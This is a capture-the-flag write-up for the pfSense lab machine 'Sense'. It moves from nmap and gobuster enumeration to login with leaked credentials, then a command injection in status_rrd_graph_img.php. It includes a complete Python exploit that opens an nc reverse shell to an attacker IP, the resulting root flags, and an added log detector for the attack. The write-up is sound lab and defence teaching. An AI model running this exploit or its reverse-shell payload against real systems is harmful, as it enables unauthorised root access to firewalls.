# Sense

![](/files/0LWl1jLdmE2aI8vBkBfD)

## Enumeration

As usual, we start with an nmap scan in order to find the open ports on the target machine.

The following nmap command scans the whole port range of the target machine quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.60 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of nmap's timing templates.
* `-Pn` skip host discovery and assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the `allPorts` file.

```
# Nmap 7.92 scan initiated Fri Jan  7 12:40:32 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

# Nmap done at Fri Jan  7 12:40:58 2022 -- 1 IP address (1 host up) scanned in 26.60 seconds
```

As we see, port *80* *(HTTP)* and port *443* *(HTTPS)* are open. Let's try to obtain more information about the services and versions running on those ports. The following command scans ports *80* and *443* in more depth and saves the result into a file:

> nmap -sC -sV -p80,443 10.10.10.60 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the `targeted` file.

```
# Nmap 7.92 scan initiated Fri Jan  7 12:47:19 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.068s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 12:47:32 2022 -- 1 IP address (1 host up) scanned in 13.30 seconds
```

Nmap identifies that port *80* redirects to port *443*. We can also see that the SSL certificate still carries the placeholder *commonName* (`Common Name (eg, YOUR name)`), so it is a default self-signed certificate. Let's take a look at the website.
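Reading the two scans above by eye is fine for a single box, but it is handy to have the normal output (`-oN`) in a structured form. The following parser is an added example written for this page, not code from the original writeup; it parses the `PORT STATE SERVICE VERSION` table and the script output lines below each port, and flags the two observations just made (the HTTP to HTTPS redirect and the placeholder certificate subject). The sample report is the `targeted` scan from above, embedded inline so the block runs offline.

```python
import re
from dataclasses import dataclass, field

# Sample input: the -sC -sV normal output shown above, embedded here so the
# parser can be run without touching the network.
SAMPLE_NMAP = """\
# Nmap 7.92 scan initiated Fri Jan  7 12:47:19 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.068s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 12:47:32 2022 -- 1 IP address (1 host up) scanned in 13.30 seconds
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
# e.g. "80/tcp  open  http       lighttpd 1.4.35"  (version column is optional)
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script output lines start with "| " or "|_"
SCRIPT_LINE = re.compile(r"^\|[_ ]\s?(.*)$")
# Subject nmap prints for OpenSSL's unfilled default certificate fields
PLACEHOLDER_CN = "commonName=Common Name (eg, YOUR name)"


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str = ""
    script_output: list = field(default_factory=list)


def parse_nmap_normal(text):
    """Return {host: [Port, ...]} from nmap -oN output."""
    hosts = {}
    current_host = None
    current_port = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current_host = m.group(1)
            hosts[current_host] = []
            current_port = None
            continue
        m = PORT_LINE.match(line)
        if m and current_host is not None:
            current_port = Port(int(m.group(1)), m.group(2), m.group(3),
                                m.group(4), (m.group(5) or "").strip())
            hosts[current_host].append(current_port)
            continue
        m = SCRIPT_LINE.match(line)
        if m and current_port is not None:
            # script output belongs to the most recent port line
            current_port.script_output.append(m.group(1).rstrip())
    return hosts


def open_ports(hosts, host):
    """Port numbers reported as open for one host."""
    return [p.number for p in hosts.get(host, []) if p.state == "open"]


def findings(port):
    """Turn script output into short notes a reviewer would want to see."""
    notes = []
    for line in port.script_output:
        if line.startswith("http-title:") and "Did not follow redirect" in line:
            notes.append("redirects to " + line.split("redirect to", 1)[1].strip())
        if line.startswith("ssl-cert:") and PLACEHOLDER_CN in line:
            notes.append("default self-signed certificate (placeholder subject)")
    return notes


if __name__ == "__main__":
    report = parse_nmap_normal(SAMPLE_NMAP)
    for host, ports in report.items():
        print(host, "open:", open_ports(report, host))
        for p in ports:
            print(f"  {p.number}/{p.proto} {p.service} {p.version}", findings(p))
```

The parser keys script output to the port line that precedes it, which is how nmap lays the report out, so a port's certificate details or HTTP title can be inspected together with its service and version.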

![](/files/AUvJeN9TzlUfupR8cCNJ)

We have a pfSense login page. We could try to brute force the credentials or attempt an SQL injection, but neither of those attacks is going to work. In fact, if you try to brute force the login page, the firewall will ban you. Let's try to list `.txt` files and directories with gobuster instead.

> gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt -k

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200.
* `-x` file **extensions** to search for.
* `-k` skips **TLS** certificate verification.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2022/01/19 19:43:14 Starting gobuster in directory enumeration mode
===============================================================
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]   
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/changelog.txt        (Status: 200) [Size: 271]                                  
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]   
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]   
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]      
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/] 
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/] 
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]   
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]      
/system-users.txt     (Status: 200) [Size: 106]                                    
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
/%7Echeckout%7E       (Status: 403) [Size: 345]                                     
                                                                                    
===============================================================
2022/01/19 20:16:23 Finished
===============================================================
```

## Exploitation

Gobuster found two interesting `.txt` files: `/changelog.txt`, which warns that a vulnerability remains to be fixed, and `/system-users.txt`, which shows us some credentials.

<div align="center"><img src="/files/nc0A6u8SRBPFvNt4o7wR" alt=""></div>

<div align="center"><img src="/files/JNgf0a97FxOunPF81nZQ" alt=""></div>

Let's search for the pfSense default credentials on Google. I found the following [link](https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html#:~:text=The%20default%20credentials%20for%20a,Password), which shows that the default password for the pfSense login page is `pfsense`. Let's try the user `rohit` from `system-users.txt` with that default password.

![](/files/mwc5zpdidNdoxnXGf5xn)

And we got in! At this point, I started looking for common exploits on exploit-db.

{% hint style="info" %}
Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

<https://www.exploit-db.com/>
{% endhint %}

And I found a [pfSense *Command Injection* exploit](https://www.exploit-db.com/exploits/43560). If you analyze the exploit, you can see that all it does is send an authenticated GET request to a specific PHP page, with a command injected into one of the URL parameters.

I preferred to exploit this vulnerability manually with a Python script. All the script does is log in with the valid credentials, keep the session cookies and the CSRF token, and then send the GET request with the encoded payload. The payload sends a reverse shell back to our machine. The script also uses the `pwn` library, which listens for the connection and drops us into an interactive shell.

```python
from pwn import *
import re
import signal
import sys
import threading
import urllib3
import requests


def def_handler(sig, frame):
    print("\n[!] Quitting...")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

url_login = "https://10.10.10.60/index.php"
# Reverse shell command; change the IP address to your own machine
command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f"

# Encode every character as a printf octal escape (\NNN) so the command
# reaches `printf '...'|sh` without any special characters in the URL
payload = ""
for char in command:
    payload += "\\" + oct(ord(char))[2:]

url_exploit = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;" + "printf+" + "'" + payload + "'|sh"
burp = {'https': 'http://127.0.0.1:8080'}  # Proxy, handy to inspect the requests in Burp


def makeRequest():
    urllib3.disable_warnings()
    s = requests.session()
    s.verify = False

    # First request only fetches the login page: session cookie + CSRF token
    r = s.post(url_login, proxies=burp)

    # csrf-magic prints the token as: var csrfMagicToken = "...";
    m = re.search(r'csrfMagicToken\s*=\s*"([^"]+)"', r.text)
    if not m:
        log.error("CSRF token not found in the login page")
    csrf_token = m.group(1)

    post_data = {
        "__csrf_magic": csrf_token,
        "usernamefld": "rohit",
        "passwordfld": "pfsense",
        "login": "Login"
    }

    login_r = s.post(url_login, data=post_data, proxies=burp)

    # The injected command never returns, so this request simply times out
    # once the reverse shell is established
    try:
        s.get(url_exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass


if __name__ == '__main__':

    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    # Listener for the reverse shell; pwntools hands us an interactive session
    shell = listen(1234, timeout=20).wait_for_connection()

    shell.interactive()
```

All you have to do is change the IP address in the payload and run the exploit with Python 3.

> python3 exploit.py

```
[+] Trying to bind to :: on port 1234: Done
[+] Waiting for connections on :::1234: Got connection from ::ffff:10.10.10.60 on port 25574
[*] Switching to interactive mode
sh: can't access tty; job control turned off
# $
```

And finally, since the shell runs as the root user, all we have to do is reap the harvest and take the flags.

```
# $ whoami
root
# $ cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
# $ cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86
```
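From the defender's side, the whole attack leaves a single telltale request in the web server's access log: a GET to `status_rrd_graph_img.php` whose `database` parameter is not a plain RRD name but carries shell metacharacters and a `printf '...'|sh` payload. The following detector is an added example for this page (my code, not part of the writeup or of pfSense); it runs over constructed lighttpd-style log lines, URL-decodes the query before matching (the client percent-encodes `\` and `|`, so matching on the raw line would miss them), allowlists what a legitimate `database` value looks like, and decodes the printf octal escapes back into the command that was executed, which is what an incident responder actually wants to know. The encoded command in the sample line is a harmless constructed `id;uname -a`, not the writeup's payload.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed lighttpd access-log lines (CLF-style). Line 2 mimics the shape of
# the request the exploit script above sends: the command hides as printf octal
# escapes and the HTTP client has percent-encoded '\' (%5C) and '|' (%7C).
SAMPLE_LOG = '''10.10.14.8 10.10.10.60 - [07/Jan/2022:12:55:01 +0000] "GET /status_rrd_graph_img.php?database=queues HTTP/1.1" 200 18355 "-" "Mozilla/5.0"
10.10.14.8 10.10.10.60 - [07/Jan/2022:12:55:09 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+'%5C151%5C144%5C73%5C165%5C156%5C141%5C155%5C145%5C40%5C55%5C141'%7Csh HTTP/1.1" 200 0 "-" "python-requests/2.27.1"
10.10.14.8 10.10.10.60 - [07/Jan/2022:12:55:10 +0000] "GET /index.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A legitimate RRD database name: letters, digits, '_', '.', '-' and nothing else
SAFE_DATABASE = re.compile(r'^[A-Za-z0-9_.-]+$')
OCTAL_ESCAPE = re.compile(r'\\([0-7]{1,3})')


def query_params(query):
    """Split a query string on '&' only: ';' must stay inside the value,
    because that is exactly the character the injection relies on."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def decode_printf_octal(text):
    """Turn printf-style octal escapes (\\151\\144 ...) back into characters."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), text)


def recover_command(value):
    """Best effort: if the value carries a printf '<octal>' payload, return the
    decoded command so the responder can see what actually ran."""
    m = re.search(r"printf\s+'([^']*)'", value)
    return decode_printf_octal(m.group(1)) if m else None


def analyse(line):
    """Return a finding dict for a suspicious RRD graph request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/status_rrd_graph_img.php'):
        return None
    for value in query_params(parts.query).get('database', []):
        if SAFE_DATABASE.match(value):
            continue  # looks like a normal RRD name
        return {
            'client': m.group('client'),
            'time': m.group('ts'),
            'database': value,
            'command': recover_command(value),
        }
    return None


def scan_log(text):
    """All findings in a block of access-log text, in log order."""
    return [hit for hit in (analyse(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"[!] {hit['time']} {hit['client']} database={hit['database']!r}")
        print(f"    decoded command: {hit['command']!r}")
```

The allowlist check is the important part: rather than hunting for `;`, `|` or `printf`, which an attacker can vary, it flags anything that is not a plausible RRD file name, so the decoder only ever runs on requests that have already been judged anomalous. The same allowlist regex is also the shape of the server-side fix, validating `database` against a strict pattern before it ever reaches a shell.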
